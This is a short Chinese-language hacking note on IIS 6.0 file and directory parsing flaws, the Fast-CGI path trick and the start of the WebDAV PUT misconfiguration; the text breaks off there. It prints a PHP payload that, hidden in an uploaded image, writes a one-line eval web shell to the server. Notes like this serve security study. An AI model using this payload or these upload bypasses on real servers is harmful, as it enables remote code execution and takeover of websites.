IIS
IIS解析漏洞
IIS 6.0解析利用方法有两种:
1:文件解析
在IIS6.0下,分号,冒号后面的不被解析,也就是说
wooyun.asp;123.jpg会被服务器看成是wooyun.asp
以下格式也会被解析:*.asa、*.asp,*.cer;*.cdx
2:目录解析
当建立*.asa、*.asp格式的文件夹时,其目录下的任意文件都将被IIS当作asp文件来解析。
3.默认解析:
在默认Fast-CGI开启状况下,黑阔上传一个名字为wooyun.jpg,内容为
<?PHP fputs(fopen('shell.php','w'),'<?php eval($_POST[cmd])?>');?>
的文件,然后访问wooyun.jpg/.php,在这个目录下就会生成一句话木马 shell.php
IIS PUT漏洞
2个错误配置造成
1.WEB服务器扩展里设置WebDAV为允许;